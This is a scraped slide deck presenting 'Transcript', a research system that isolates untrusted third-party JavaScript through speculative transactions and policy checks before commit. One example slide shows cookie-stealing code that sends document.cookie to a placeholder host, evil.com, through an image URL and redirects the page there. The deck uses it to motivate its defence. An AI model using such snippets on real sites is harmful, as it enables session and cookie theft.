Download presentation
Presentation is loading. Please wait.
Published byTommy Skye Modified over 9 years ago
1
The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010
2
Problem Web applications include third party content Examples: widgets, advertisements, libraries May contain untrusted, malicious JavaScript April 13, 20152PLAS 2010
3
Example from nytimes.com Rouge third party advertisement Displayed image of fake virus scan Client security and privacy at risk April 13, 20153PLAS 2010
4
Goal Protect Web application data by isolating untrusted JavaScript code Must handle arbitrary 3 rd party code written in JavaScript Including constructs such as eval, this, with. Must enforce powerful security policies Allow pop-ups from white-listed websites only. April 13, 20154PLAS 2010
5
Outline Problem Transcript Example Implementation Related Work Conclusion April 13, 20155PLAS 2010
6
Solution: Transcript Extend JavaScript to support Transactions Execute untrusted content speculatively Commit changes after policy enforcement Transaction Web Application April 13, 20156PLAS 2010
7
Transcript features Speculative execution of unmodified third party JavaScript code Suspend transactions on DOM and AJAX operations Transactional execution of event handlers April 13, 20157PLAS 2010
8
Schematic use of Transcript // Web application code var tx = transaction{... // unmodified 3 rd party code... }; // Introspection block goes below /* policy enforcement code */ // validate actions of the transaction tx.commit(); //Rest of the Web application code Transaction Web Application April 13, 20158PLAS 2010
9
Outline Problem Transcript Example Implementation Related Work Conclusion April 13, 20159PLAS 2010
10
Example: Untrusted code // Web application code var tx = transaction{ var image = document.createElement(‘img’); var url = "http://evil.com/grabcookie.php"; var params = document.cookie; image.src = url + "?cookie=" + params; document.body.appendChild(image);... window.location = "http://evil.com"; }; Transaction Web Application April 13, 201510PLAS 2010
11
April 13, 2015PLAS 201011 tx = transaction {... body.appendChild(image);... }; do {... tx = tx.resume();... } while(tx.isSuspended()); tx.commit(); Web application code … Rest of the Web application read and write sets call stack 3 rd party Transaction object tx web app call stack 3 rd -party …… resume … … call stack 3 rd party 1 2 3 tx’s write set + Heap orig Heap new = 4 12 34 5 read and write sets call stack 3 rd party Transaction object tx web app web app* Transcript runtime system Introspection block Transcript Runtime On a transaction suspend, the Transcript runtime saves all the i) read write sets, and ii) stack frames till the nearest transaction delimiter to create a Transaction object Transcript runtime loads the saved read write sets and stack frames when the transaction resumes. Transcript runtime applies the write set changes to the JavaScript heap when the transaction commits.
12
Transaction suspend and resume Transaction Web Application April 13, 201512PLAS 2010 var tx = transaction{... document.body.appendChild(image); }; do{ var rs = tx.getReadSet(), arg = tx.getArgs(); switch(tx.getCause()) { case "appendChild": if (arg[0].nodeName.match("IMG") && !rs.checkMembership(document,"cookie")) obj.appendChild(arg[0]); break; }; /* end switch */ tx = tx.resume(); }while(tx.isSuspended()); if (arg[0].nodeName.match("IMG") && !rs.checkMembership(document,"cookie")) obj.appendChild(arg[0]); Policy
13
Read and Write Sets var tx = transaction{... window.location = "http://evil.com"; }; /* Introspection Code */ var ws = tx.getWriteSet(); if(ws.checkMembership(window,"location")){ var loc = ws.getValue(window, "location"); if(!isWhiteListed(loc)) to_commit = false; } // Rest of the web application code Transaction Web Application var ws = tx.getWriteSet(); if(ws.checkMembership(window,"location")){ var loc = ws.getValue(window, "location"); if(!isWhiteListed(loc)) to_commit = false; } Policy April 13, 201513PLAS 2010
14
Outline Problem Transcript Example Implementation Related Work Conclusion April 13, 201514PLAS 2010
15
Implementation Prototype implementation in Firefox 3.7a4 Added new JavaScript features transaction keyword and Transaction object Modified interpreter op-codes to Log all object accesses Suspend on DOM / AJAX calls For details on semantics of the transactions, kindly refer the paper. April 13, 201515PLAS 2010
16
Outline Problem Transcript Example Implementation Related Work Conclusion April 13, 201516PLAS 2010
17
Related Work Staged information flow in JavaScript: PLDI'09 hybrid framework for JavaScript with the aim of protecting Web applications from untrusted code Conscript: S&P'10 aspect-oriented framework to specify and enforce fine- grained security policies for Web applications AdJail: USENIX Security'10 isolation mechanism to protect Web application content from malicious advertisements Caja, FBJS, AdSafe, etc. April 13, 201517PLAS 2010
18
Conclusion JavaScript transactions provide isolation Suspend operations that break isolation Resume operation if web application allows Enforcement of powerful security policies All data reads / writes are recorded Ability to inspect reads / writes before commit No restriction or changes to third party code April 13, 201518PLAS 2010
19
Questions ? April 13, 201519PLAS 2010
Similar presentations
© 2024 SlidePlayer.com. Inc.
All rights reserved.